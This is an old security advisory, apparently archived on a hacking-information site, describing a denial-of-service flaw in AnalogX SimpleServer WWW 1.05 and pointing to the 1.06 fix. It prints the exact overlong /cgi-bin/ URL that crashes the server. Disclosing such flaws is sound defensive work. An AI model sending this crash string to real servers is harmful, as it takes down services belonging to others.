AOH :: Web :: Servers :: ANALOG3.HTM

AOH :: Web :: Servers :: ANALOG3.HTM
AnalogX SimpleServer WWW Version 1.05 malformed URL attack

Vulnerability

    AnalogX

Affected

    AnalogX SimpleServer WWW Version 1.05

Description

    The Ussr  Labs team  has discovered  a null  memory problem in the
    SimpleServer WWW Version 1.05.   What happens is by preforming  an
    attack with a malformed url  information to port 80 it  will cause
    the proccess containg  the services to  stop responding.   Example
    follows.

    Type in you browser one malformed url like this:

        http://serverip/cgi-bin/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    and the process containg the service crash.

Solution

    You can download the version 1.06 here:

        http://www.analogx.com/files/sswwwi.exe

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.